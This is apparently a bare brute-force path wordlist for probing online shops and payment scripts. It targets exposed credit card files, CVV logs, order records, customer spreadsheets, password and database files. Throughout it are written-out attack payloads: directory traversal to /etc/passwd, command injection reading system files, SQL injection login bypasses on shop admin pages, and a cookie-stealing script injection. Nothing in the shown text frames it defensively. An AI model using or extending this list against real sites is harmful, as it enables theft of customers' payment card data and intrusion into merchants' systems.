/ccard
/ccard/
/ccards/
/ccv.csv
/ccv.log
/ccv.txt
/cgi-bin-shop/
/cgi-bin/.../authorize.csv
/cgi-bin/.../authorize.cvs
/cgi-bin/.../authorizenet.log
/cgi-bin/.../authorizenets.old
/cgi-bin/.../card.csv
/cgi-bin/.../card.log
/cgi-bin/.../card.txt
/cgi-bin/.../cc.csv
/cgi-bin/.../cc.log
/cgi-bin/.../cc.txt
/cgi-bin/.../ccv.csv
/cgi-bin/.../ccv.log
/cgi-bin/.../ccv.txt
/cgi-bin/.../cvv.csv
/cgi-bin/.../cvv.log
/cgi-bin/.../cvv.txt
/cgi-bin/.../cvv2.csv
/cgi-bin/.../cvv2.log
/cgi-bin/.../cvv2.txt
/cgi-bin/.../order.csv
/cgi-bin/.../order.log
/cgi-bin/.../order.txt
/cgi-bin/.../orders.txt
/cgi-bin/.../shopper.conf
/cgi-bin/authorizenet.cgi/
/Cgi-Bin/cart.pl
/cgi-bin/cart.pl?db
/cgi-bin/cart.pl?db='
/cgi-bin/cart.pl?env
/cgi-bin/cart.pl?path
/cgi-bin/cart.pl?vars
/cgi-bin/cart/
/cgi-bin/cart/cart.pl?path
/cgi-bin/cart/cart.pl?vars
/cgi-bin/cart/pending.dat
/cgi-bin/cart/vars.dat
/cgi-bin/cart32.exe
/cgi-bin/cart32.exe/error
/cgi-bin/cart32.exe/expdate
/cgi-bin/cart32.mdb
/cgi-bin/cart32/
/cgi-bin/cart32/tempfiles.list
/Cgi-Bin/cartmanager.cgi
/cgi-bin/comersus/store/database/comersus.mdb
/cgi-bin/comersus/store/shopadmin1.asp
/cgi-bin/commerce.cgi
/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/paswd%00index.html
/cgi-bin/commerce.cgi?page=check
/cgi-bin/conf/merchant_conf
/cgi-bin/config/datasources/myorder.mdb
/cgi-bin/cybercash-3.2/conf/merchant_conf
/cgi-bin/cybercash/
/cgi-bin/cybercash/conf/merchant_conf
/cgi-bin/dcshop.cgi
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/dcprotect.pl
/cgi-bin/DCShop/dcshop_admin.cgi
/cgi-bin/DCShop/dcshop_admin.setup
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShopAuth_data/auth_user_file.txt
/cgi-bin/e-cart
/cgi-bin/e-cart/cart.txt
/cgi-bin/ecommerce/
/cgi-bin/ecommerce/passwords
/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
/cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/eurodebit/data/.htpasswd
/cgi-bin/ezmall2000/mall2000.cgi
/cgi-bin/ezmall2000/mall2000.cgi?page=../../../../../../../bin/comando%20/diretorio/00.html%7c
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper2/loadpage.cgi?+//
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/ezshopper2/loadpage.cgi?id+/subdiretorio/
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/
/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=//
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/i-shop/
/cgi-bin/i-shop/admin/store.log
/cgi-bin/i-shop/admin/store_user_lib.pl
/cgi-bin/i-shopEire/admin/store.log
/cgi-bin/i-shoppro/
/cgi-bin/i-shoppro/admin/store.log
/cgi-bin/i-shopSale/admin/store.log
/cgi-bin/ibill
/cgi-bin/ibill/
/cgi-bin/ibill/.htpasswd
/cgi-bin/ibill/mypasswd/.memberfile
/cgi-bin/ibillpm.pl
/cgi-bin/ibll
/cgi-bin/ibll.log
/cgi-bin/mall2000.cgi
/cgi-bin/msbill
/cgi-bin/msbill.log
/cgi-bin/msbilllog.txt
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/netbilling
/cgi-bin/netbilling/
/cgi-bin/netbilling/.dbusers.db
/cgi-bin/netbilling/.htaccess
/cgi-bin/netbilling/.htpasswd
/cgi-bin/netbilling/.htusers
/cgi-bin/netbilling/.passwrd
/cgi-bin/netbilling/crontab.txt
/cgi-bin/netbilling/expire.txt
/cgi-bin/netbilling/htusers
/cgi-bin/netbilling/robots.txt
/cgi-bin/netbilling/WS_FTP.LOG
/cgi-bin/order
/cgi-bin/order.cgi
/cgi-bin/order.dat
/cgi-bin/order.db
/cgi-bin/order.log
/cgi-bin/order.mdb
/cgi-bin/order.txt
/cgi-bin/order1.log
/cgi-bin/OrderForm.cgi
/cgi-bin/orderinfo.txt
/cgi-bin/orderlog.txt
/cgi-bin/orders.dat
/cgi-bin/orders.log
/cgi-bin/orders.mdb
/cgi-bin/orders.txt
/cgi-bin/orders/
/cgi-bin/orders/*.olf
/cgi-bin/orders/1001.1.log
/cgi-bin/orders/cc.txt
/cgi-bin/orders/mc.txt
/cgi-bin/orders/orders
/cgi-bin/Orders/orders.txt
/cgi-bin/orders/orders/
/cgi-bin/orders/track.db
/cgi-bin/payment.mart
/cgi-bin/paypal.cgi
/cgi-bin/paypal/
/cgi-bin/paypal/command
/cgi-bin/paypal/test.txt
/cgi-bin/paypal/test2.txt
/cgi-bin/paypal/test3.txt
/cgi-bin/paypal/test4.txt
/cgi-bin/PDG
/cgi-bin/PDG_cart/card.txt
/cgi-bin/PDG_Cart/mc.txt
/cgi-bin/pdg_cart/order.csv
/cgi-bin/PDG_Cart/order.log
/cgi-bin/perlshop.cgi
/cgi-bin/quikstore.cgi
/cgi-bin/quikstore.cgi?page=../../../../../../../etc/passwd%00.html&cart_id=
/cgi-bin/quikstore.cgi?page=../orders/%00html&cart_id=
/cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
/cgi-bin/quikstore.cgi?page=orders/%00html&cart_id=
/cgi-bin/quikstore.cgi?store='
/cgi-bin/scripts/cart.pl
/cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
/cgi-bin/scripts/cart.pl?env
/cgi-bin/scripts/cart.pl?vars
/cgi-bin/secure/orders
/cgi-bin/secure/orders/
/cgi-bin/shop-dat.dat
/cgi-bin/shop.cgi
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/shop.cgi/page=../../../../etc/passwd
/cgi-bin/shop.log
/cgi-bin/shop.pl
/cgi-bin/shop.pl/page=../../../../etc/passwd
/cgi-bin/shop.pl?page=xxx
/cgi-bin/shop/Auth_data/auth_user_file.txt
/cgi-bin/shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
/cgi-bin/shop/info.dat
/cgi-bin/shop/Orders/orders.txt
/cgi-bin/shop/pgp_encrypt/cc_store_lib.pm
/cgi-bin/shop/pgp_encrypt/order_admin.cgi
/cgi-bin/shop/pgp_encrypt/pgp_lib.pm
/cgi-bin/shop/pgp_encrypt/print_invoice.cgi
/cgi-bin/shop/pgp_encrypt/process.cgi
/cgi-bin/shop/pgp_encrypt/store_admin.cgi
/cgi-bin/shop/pgp_encrypt/store_params.cgi
/cgi-bin/shop/pgp_encrypt/validate_card.pm
/cgi-bin/shop/shop/
/cgi-bin/shop/smart.cfg
/cgi-bin/shop/track.db
/cgi-bin/shopadmin.asp
/cgi-bin/shopper
/cgi-bin/shopper.cgi
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG
/cgi-bin/shopper.cgi?
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/shopper.cgi?newpage=../../../etc/passwd
/cgi-bin/shopper.cgi?search=action&keywords=HACK&template=o rder.log
/cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template =order.log
/cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template =order1.log
/cgi-bin/shopper.exe
/cgi-bin/shopper.exe?display=action&template=order.log
/cgi-bin/shopper.exe?key=&20&preadd=action&template=order.l og
/cgi-bin/shopper.exe?search=action&keywords=%20&template=or der.log
/cgi-bin/shopper.exe?search=action&keywords=musksx&template =order.log
/cgi-bin/shopper.exe?search=action&keywords=TryThis&templat eds=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi
/cgi-bin/shopping.mdb
/cgi-bin/shoppper.exe/.../card.log
/cgi-bin/shoppper.exe/.../card.txt
/cgi-bin/shoppper.exe/.../order.csv
/cgi-bin/shoppper.exe/.../order.log
/cgi-bin/shoppper.exe/.../order.txt
/cgi-bin/shoppper.exe/PDG_cart/order.log
/cgi-bin/shopsearch.asp
/cgi-bin/store.cgi
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/store.cgi?StartID=../etc/passwd%00.html
/cgi-bin/store/Admin_files/
/cgi-bin/store/admin_files/order.log
/cgi-bin/store/Admin_files/orders.txt
/cgi-bin/store/agora.cgi?page=hoschi.html
/cgi-bin/store/dcshop_admin.cgi
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/store/pgp_encrypt/cc_store_lib.pm
/cgi-bin/store/pgp_encrypt/order_admin.cgi
/cgi-bin/store/pgp_encrypt/pgp_lib.pm
/cgi-bin/store/pgp_encrypt/print_invoice.cgi
/cgi-bin/store/pgp_encrypt/process.cgi
/cgi-bin/store/pgp_encrypt/store_admin.cgi
/cgi-bin/store/pgp_encrypt/store_params.cgi
/cgi-bin/store/pgp_encrypt/validate_card.pm
/cgi-bin/ustorekeeper.pl
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls|
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/cgi-bin/Web_Store/web_store.cgi
/cgi-bin/Web_Store/web_store.cgi?page=%00
/cgi-bin/Web_Store/web_store.cgi?page=../../../path/filename%00ext
/cgi-bin/webcart/
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;l s|&CODE=PHOLD
/cgi-bin/webcash
/cgi-bin/webcash/
/cgi-bin/webcash/.dbusers.db
/cgi-bin/webcash/.htaccess
/cgi-bin/webcash/.htpasswd
/cgi-bin/webcash/.htusers
/cgi-bin/webcash/.passwrd
/cgi-bin/webcash/crontab.txt
/cgi-bin/webcash/expire.txt
/cgi-bin/webcash/htusers
/cgi-bin/webcash/robots.txt
/cgi-bin/webcash/WS_FTP.LOG
/cgi-bin2/authorize
/cgi-bin2/ibll
/cgi-bin2/ibll.log
/cgi-bin2/msbill
/cgi-bin2/msbill.log
/cgi-bin2/netbilling
/cgi-bin2/newoordir
/cgi-bin2/webcash
/cgi-local/cart.pl
/cgi-local/cybercash-3.2/conf/merchant_conf
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/orders/orders.txt
/cgi-local/orders/
/cgi-local/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/cgi-local/shop.cfg
/cgi-local/shop.cgi
/cgi-local/shop.cgi/page=../../../../etc/passwd
/cgi-local/shop.pl
/cgi-local/shop.pl/page=%s
/cgi-local/shop.pl/page=../../../../etc/passwd
/cgi-local/shop.pl/page=;id|
/cgi-local/shop.pl/page=;ls|
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-local/shop/
/cgi-local/shop/auth_data/auth_user_file.txt
/cgi-local/shop/orders/orders.txt
/cgi-local/shop/secure
/cgi-local/shop/secure/
/cgi-local/Web_Store/web_store.cgi
/cgi-shop/
/cgi-shop/?open
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc%00
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/passwd%00
/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0000
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0001
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=1900-0999
/cgi-shop?open
/cgi-temp/Web_Store/web_store.cgi
/cgi-win/netbilling/
/cgi-win/netbilling/.dbusers.db
/cgi-win/netbilling/.freshteen
/cgi-win/netbilling/.htaccess
/cgi-win/netbilling/.htpasswd
/cgi-win/netbilling/.htusers
/cgi-win/netbilling/.passwrd
/cgi-win/netbilling/crontab.txt
/cgi-win/netbilling/expire.txt
/cgi-win/netbilling/htusers
/cgi-win/netbilling/robots.txt
/cgi-win/netbilling/WS_FTP.LOG
/cgi-win/shop/auth_data/auth_user_file.txt
/cgi-win/shop/orders/orders.txt
/cgi-win/Web_Store/web_store.cgi
/cgi-win/webcash/
/cgi-win/webcash/.dbusers.db
/cgi-win/webcash/.freshteen
/cgi-win/webcash/.htaccess
/cgi-win/webcash/.htpasswd
/cgi-win/webcash/.htusers
/cgi-win/webcash/.passwrd
/cgi-win/webcash/crontab.txt
/cgi-win/webcash/expire.txt
/cgi-win/webcash/htusers
/cgi-win/webcash/robots.txt
/cgi-win/webcash/WS_FTP.LOG
/cgi/cart.pl
/Cgi/cartmanager.cgi
/cgi/commerce.cgi
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/orders/orders.txt
/cgi/i-shop/admin/store.log
/cgi/i-shoppro/admin/store.log
/cgi/ibill/
/cgi/netbilling/
/cgi/netbilling/.dbusers.db
/cgi/netbilling/.htaccess
/cgi/netbilling/.htpasswd
/cgi/netbilling/.htusers
/cgi/netbilling/.passwrd
/cgi/netbilling/crontab.txt
/cgi/netbilling/expire.txt
/cgi/netbilling/htusers
/cgi/netbilling/robots.txt
/cgi/netbilling/WS_FTP.LOG
/cgi/order.cgi
/cgi/orders/orders.txt
/cgi/PDG_Cart/order.log.%207,%200.94,%20/cgi-bin/PDG_cart/card.txt
/cgi/Web_Store/web_store.cgi
/cgi/webcash/
/cgi/webcash/.dbusers.db
/cgi/webcash/.htaccess
/cgi/webcash/.htpasswd
/cgi/webcash/.htusers
/cgi/webcash/.passwrd
/cgi/webcash/crontab.txt
/cgi/webcash/expire.txt
/cgi/webcash/htusers
/cgi/webcash/robots.txt
/cgi/webcash/WS_FTP.LOG
/cgi_bin/DCShop/Auth_data/auth_user_file.txt
/cgi_bin/DCShop/Orders/orders.txt
/cgi_bin/Orders/orders.txt
/cgi_bin/shop/Auth_data/auth_user_file.txt
/cgi_bin/shop/Orders/orders.txt
/cgibin/DCShop/Auth_data/auth_user_file.txt
/cgibin/DCShop/Orders/orders.txt
/cgibin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgibin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt
/cgibin/i-shop/admin/store_user_lib.pl
/cgibin/ib
/cgibin/ibill/
/cgibin/ibll
/cgibin/ibll.log
/cgibin/msbill
/cgibin/msbill.log
/cgibin/netbilling
/cgibin/netbilling/
/cgibin/netbilling/.dbusers.db
/cgibin/netbilling/.freshteen
/cgibin/netbilling/.htaccess
/cgibin/netbilling/.htpasswd
/cgibin/netbilling/.htusers
/cgibin/netbilling/.passwrd
/cgibin/netbilling/crontab.txt
/cgibin/netbilling/expire.txt
/cgibin/netbilling/htusers
/cgibin/netbilling/robots.txt
/cgibin/netbilling/WS_FTP.LOG
/cgibin/Orders/orders.txt
/cgibin/shop/Auth_data/auth_user_file.txt
/cgibin/shop/Orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=TRY%20&template =order.log
/cgibin/Web_Store/web_store.cgi
/cgibin/webcash
/cgibin/webcash/
/cgibin/webcash/.dbusers.db
/cgibin/webcash/.htaccess
/cgibin/webcash/.htpasswd
/cgibin/webcash/.htusers
/cgibin/webcash/.passwrd
/cgibin/webcash/crontab.txt
/cgibin/webcash/expire.txt
/cgibin/webcash/htusers
/cgibin/webcash/robots.txt
/cgibin/webcash/WS_FTP.LOG
/cgin-bin2/Web_Store/web_store.cgi
/cgis/cart.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/orders/orders.txt
/cgis/orders/orders.txt
/checkout.php
/checkout_payment.php
/checkout_payment.php?payment_error=cc&error=%3Cscr ipt%20language=javascript%3Ewindow.alert%28documen t.cookie%29;%3C/script%3E
/checkoutdb.php
/comersus.mdb
/comersus/
/comersus/admin
/comersus/admin.php
/comersus/admin/
/comersus/admin/customers.csv
/comersus/admin/customers.xls
/comersus/admin/index.php
/comersus/admin/sales.csv
/comersus/backoffice+
/comersus/backoffice+/
/comersus/backoffice+/default.asp
/comersus/backoffice/
/comersus/backoffice/customers.csv
/comersus/backoffice/customers.xls
/comersus/backoffice/default.asp
/comersus/backoffice/index.asp
/comersus/backoffice/sales.csv
/comersus/backoffice/sales.xls
/comersus/BackOfficeGold/comersus_backoffice_genericSqlExec.asp
/comersus/backofficegold/customers.csv
/comersus/backofficegold/customers.xls
/comersus/backofficegold/default.asp
/comersus/backofficegold/sales.csv
/comersus/backofficegold/sales.xls
/comersus/backofficelite/chart.gif
/comersus/backofficelite/comersus_backoffice_index.asp
/comersus/backofficelite/customers.csv
/comersus/backofficelite/customers.xls
/comersus/backofficelite/images/
/comersus/backofficelite/index.asp
/comersus/backofficelite/sales.csv
/comersus/backofficelite/sales.xls
/comersus/comersus.mdb
/comersus/comersus/backofficelite/default.asp
/comersus/database/*
/comersus/database/admin/index.php
/comersus/database/comersus.mdb
/comersus/database/comersus_gatewaysecurepay.asp
/comersus/database/comersus_OfflinepaymentForm.asp
/comersus/database/comersus_viewItem.asp
/comersus/database/sales.xls
/comersus/databsse/comersus.mdb
/comersus/diagnosticsAndTools
/comersus/nhun
/comersus/store/backofficelite/default.asp
/comersus/store/comersus.mdb
/comersus/store/comersus/backofficelite/default.asp
/comersus/store/comersus/comersus.mdb
/comersus/store/comersus/databases/comersus.mdb
/comersus/store/comersus_dbtest.asp
/comersus/store/comersus_optAuctionListAll.asp
/comersus/store/comersus_optEmailToFriendForm.asp
/comersus/store/comersus_optForgotPasswordForm.asp
/comersus/store/comersus_optListBestSellers.asp
/comersus/store/comersus_optNewsletterAddemailForm.asp
/comersus/store/comersus_optPriceListExec.asp
/comersus/store/comersus_optReviewAddForm.asp
/comersus/store/comersus_viewitem.asp
/comersus/store/database
/comersus/store/database/comersus.mdb
/comersus/store/databases/comersus.mdb
/comersus/store/db/store.mdb
/comersus/store/favicon.ico
/comersus/store/shopadmin1.asp
/comersus/store/shopdbtest.asp
/comersus/WS_FTP.ini
/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/commerce/
/config/checks.txt
/config/orders.txt
/custdata/
/customer/
/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
/customerdata.nsf
/customers
/customers.csv
/customers.xls
/customers/
/cvv.csv
/cvv.dbf
/cvv.ldf
/cvv.log
/cvv.mbf
/cvv.txt
/cvv2.csv
/cvv2.log
/cvv2.txt
/cybercash-3.2/conf/merchant_conf
/cybercash/
/cybercash/conf/
/cybercash/conf/merchant_conf
/Cybercash/smps*.../merchants/admin.pw
/data/paypal
/database/cart32.mdb
/database/comersus.mdb
/database/metacart.mdb
/database/MFIIstore.mdb
/database/sales.xls
/database/ShopCart2.mdb
/database/shopping500.mdb
/database/virtuastore.mdb
/database/xshop.mdb
/db/merchant_conf
/db/shop.mdb
/db/store.mdb
/db_order.txt
/DC/Auth_data/auth_user_file.txt
/DC/Orders/orders.txt
/DCShop/Auth_data/auth_user_file.txt
/DCShop/dcshop_admin.cgi
/DCShop/Orders/orders.txt
/dcshop_admin.cgi
/e-cart/
/eshop.pl/seite=;cat%20eshop.pl|
/eshop/
/eshop/10Expand.asp?ProdcutCode=' having 1=1
/eshop/10Expand.asp?ProductCode='
/eshop/20Review.asp?ProductCode='
/eshop/20Reviw.asp?ProductCoce=' having 1=1 --
/eshop/database/shop.mdb
/eshop/shop.mdb
/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template =../../../../../../../etc/passwd&distinct=1
/fpdb/
/fpdb/acart.mdb
/fpdb/acart2.mdb
/fpdb/acart20.mdb
/fpdb/acart2_0.mdb
/fpdb/apstore.mdb
/fpdb/shop.mdb
/fpdb/shopping.mdb
/fpdb/shopping500.mdb
/fpdb/store.mdb
/fpdb/storefront.mdb
/htbin/cart.pl
/htbin/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/orders/orders.txt
/htbin/orders/orders.txt
/htbin/shop/auth_data/auth_user_file.txt
/htbin/shop/orders/orders.txt
/i-shop/admin/store.log
/i-shop/admin/store_user_lib.pl
/i-shoppro/
/i-shoppro/admin/store.log
/include/orders.inc
/ishop/
/log/xcartdump.sql
/log_files/my_order.log
/log_files/order.csv
/log_files/order.log
/log_files/order.txt
/log_files/orders.csv
/log_orders
/log_orders/
/loja/midicart.mdb
/loja/order-shop.dat
/loja/order.txt
/loja/pkg/catalog/extras/orders/
/main/webcash
/mall/Auth_data/auth_user_file.txt
/mall/Orders/orders.txt
/mall_log_files
/mall_log_files/
/mall_log_files/order.log
/mcartfree/database/metacart.mdb
/members/webcash
/Merchant2/
/Merchant2/admin.mv
/Merchant2/database/
/Merchant2/INSTALL.txt
/Merchant2/modules/
/merchants/admin.pw
/metacart/database/metacart.mdb
/midicart.mdb
/MIDICART/midicart.mdb
/midicart_asp/shop/midicart.md
/midicart_asp/shop/midicart.mdb
/modules/paypal.php
/msbill
/msbill/msbilllog.txt
/mtdata/mtstore.nsf
/mtstore.nsf
/my_order.log
/my_orders.log
/myorder.log
/myorder.txt
/myorderlog.txt
/myorders.log
/netbilling
/online-store/scstore/
/online-store/scstore/scpages/
/onlinepurchase
/onlinepurchase/
/onlinepurchase/authorization/account.asp?accnumber=100000001
/order
/order-shop.dat
/order.log
/order.sql
/order.txt
/order/
/order/admin
/order/admin/
/order/cartmanager.cgi
/order/compatible.cgi
/order/db_manager.cgi
/order/jadat.asp
/order/order.dat
/order/order.log
/order/order_log.dat
/order/order_log_v12.dat
/order/shop-oder.dat
/order1.log
/order_log_v12.dat
/orderdetalis.aspx
/orderform/orders.txt
/orderinfo.txt
/ORDERS
/orders*
/orders.htm
/orders.inc
/orders.log
/orders.mdb
/orders.php
/orders.sql
/orders.txt
/ORDERS/
/orders/%3f.jsp
/orders/*
/orders/*.olf
/orders/?open
/orders/admin
/orders/admin.asp
/orders/admin/
/orders/cart.pl
/orders/cartmanager.cgi
/orders/checks.txt
/orders/db_manager.cgi
/orders/import.txt
/orders/info.xml
/orders/jadat.dat
/orders/mountain.cfg
/orders/order-shop.dat
/Orders/order.log
/orders/order.txt
/Orders/order_log.dat
/Orders/order_log_v12.dat
/orders/orders.log
/Orders/orders.txt
/orders/results
/orders/track.db
/orders/WS_FTP.ini
/orders?open
/ordersorders.txt
/oscommerce/
/Oscommerce/catalog/
/Oscommerce/catalog/admin/
/Oscommerce/catalog/admin/orders.php
/oscommerce/default.php
/Osecommerce/
/Osecommerce/admin/
/Osecommerce/admin/admin/
/Osecommerce/admin/admin/includes/
/Osecommerce/admin/admin/includes/functions/
/Osecommerce/admin/admin/includes/functions/database.php
/payment.mart
/payment/
/payments/
/paypal/command
/paypal/test.txt
/paypal/test2.txt
/paypal/test3.txt
/paypal/test4.txt
/paytest.php
/PDG/cvv2.txt
/PDG/order.txt
/PDG_Cart
/PDG_Cart/
/PDG_Cart/authorizenet.txt
/PDG_Cart/authorizenets.txt
/PDG_Cart/cc.txt
/PDG_Cart/oder.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/PDG_Cart/shopper.config
/private-cgi-bin/cart32/1.txt
/private-cgi-bin/cart32/2.txt
/private-cgi-bin/cart32/3.txt
/private-cgi-bin/cart32/4.txt
/private-cgi-bin/cart32/5.txt
/private-cgi-bin/cart32/6.txt
/private-cgi-bin/cart32/7.txt
/ProcuctCart/pc/pcadmin/
/ProdctCart/pcadmin/
/produccart/pdacmin/login.asp
/productcart/AspShipCalc/
/productcart/charts/
/productcart/database/
/ProductCart/database/EIPC.mdb
/productcart/includes/
/productcart/includes/adminv.asp
/productcart/includes/diagtxt.txt
/productcart/includes/opendb.asp
/productcart/includes/status.inc
/productcart/pc/
/ProductCart/pc/admin
/productcart/pc/Custva.asp
/productcart/pc/pcadmin/
/productcart/pcadmin/
/productcart/pcadmin/login.asp
/productcart/pcadmin/login.asp?idadmin=' or '1'='1
/productcart/pcadmin/login.asp?idadmin='' or 1=1--
/productcart/pcadmin/login_1.asp
/productcart/pdadmin/login.asp?idadmin=' having 1=1 --
/productcart/setup_2/
/productcart/UPSLicense/
/PTSC/db/PTSC.mdb
/purchase
/purchase/
/purchases
/purchases/
/q-shop25/admin/security.asp
/q-shop25/inc/conx.asp
/qshop/db/store.mdb
/qshop/store.mdb
/quickstore.cfg
/quikstore.cfg
/quikstore.cgi
/quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
/quikstore.cgi?blah&template=../../../../../../../../../../../../usr/bin/id|
/quikstore.cgi?blah&template=../../../../../../../../../../etc/passwd%00.html
/quikstore.cgi?store='
/s-cart/
/s-cart/admin
/s-cart/admin/
/sales
/sales.csv
/sales.xls
/sales/
/Sales_files/
/scart.mdb/ashopkart20+-+ashoptkart20/admin
/scripts/cart.pl
/scripts/cart32.exe
/scripts/cart32.exe/cart32clientlist
/scripts/cart32.exe/cart32clientlist?passwd=wemilo
/scripts/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/orders/orders.txt
/scripts/orders/orders.txt
/scripts/shop/auth_data/auth_user_file.txt
/scripts/shop/orders/orders.txt
/scripts/webcash/
/scripts/webcash/.dbusers.db
/scripts/webcash/.htaccess
/scripts/webcash/.htpasswd
/scripts/webcash/.htusers
/scripts/webcash/.passwrd
/scripts/webcash/crontab.txt
/scripts/webcash/expire.txt
/scripts/webcash/htusers
/scripts/webcash/robots.txt
/scripts/webcash/WS_FTP.LOG
/secure/cart.pl
/secure/order-shop.dat
/secure/order.log
/secure/order.txt
/secure/orders
/secure/orders*
/secure/orders.secure
/secure/orders/
/secure/orders/jadat.dat
/secure/orders/order-shop.dat
/secure/orders/order.txt
/secure/secure/order-shop.dat
/secure/secure/order.txt
/shipping/
/shop
/shop.asp'
/shop.asp()
/shop.asp)
/shop.cgi
/shop.mdb
/shop.pl
/shop/
/shop/%00
/shop/%3f.jsp
/shop//include/
/shop/0%20WEB%20CATEGORIES
/shop/?category=xxxxxx&parent=0&page=x&/'
/shop/?open
/shop/_vti_cnf/form_results.htm
/shop/_vti_cnf/form_results.html
/shop/_vti_cnf/form_results.txt
/shop/_vti_cnf/order.log
/shop/_vti_cnf/order.txt
/shop/add.jsp
/shop/admin
/shop/admin.asp
/shop/admin.html
/shop/admin/
/shop/admin/Admin.asp
/shop/admin/category_detail.php
/shop/admin/config.inc.php
/shop/admin/db.sql
/shop/admin/default.asp
/shop/admin/detail.php
/shop/admin/footer.php
/shop/admin/graphics/
/shop/admin/header.php
/shop/admin/index.php
/shop/admin/jscript/
/shop/admin/list_categories.php
/shop/ADMIN/login.ASP
/shop/admin/mysql.info.php
/shop/admin/shop_login.htm
/shop/admin/WS_FTP.LOG
/shop/Admin_files/commerce.cgi
/shop/administrador.asp
/shop/Auth_data/auth_user_file.txt
/shop/authorize.csv
/shop/authorizenet.log
/shop/authorizenets.old
/shop/backlink.js
/shop/card.csv
/shop/card.log
/shop/card.txt
/shop/cart.pl
/shop/cart.sql
/shop/cartmanager.cgi
/shop/category1.tpl
/shop/cc.csv
/shop/cc.log
/shop/cc.txt
/shop/ccv.csv
/shop/ccv.log
/shop/ccv.txt
/shop/cgi-bin/DCShop/
/shop/cgi-bin/DCShop/dcprotect.pl
/shop/cgi-bin/DCShop/dcshop_admin.cgi
/shop/cgi-bin/DCShop/dcshop_admin.setup
/shop/cgi-bin/DCShop/Orders/
/shop/checkout.php
/shop/checkoutdb.php
/shop/client.eml
/shop/code.php
/shop/code.php3
/shop/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
/shop/compatible.cgi
/shop/conf/
/shop/conf/merchant_conf
/shop/config.inc.php
/shop/configure.php
/shop/create.jsp
/shop/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
/shop/customer/home.php
/shop/customers.csv
/shop/customers.xls
/shop/cvv.csv
/shop/cvv.log
/shop/cvv.txt
/shop/cvv2.csv
/shop/cvv2.log
/shop/cvv2.txt
/shop/cybercash/
/shop/cybercash/conf/merchant_conf
/shop/data.info
/shop/data/
/shop/data/info.dat
/shop/database.mdb
/shop/database/
/shop/database/metacart.mdb
/shop/database/virtuastore.mdb
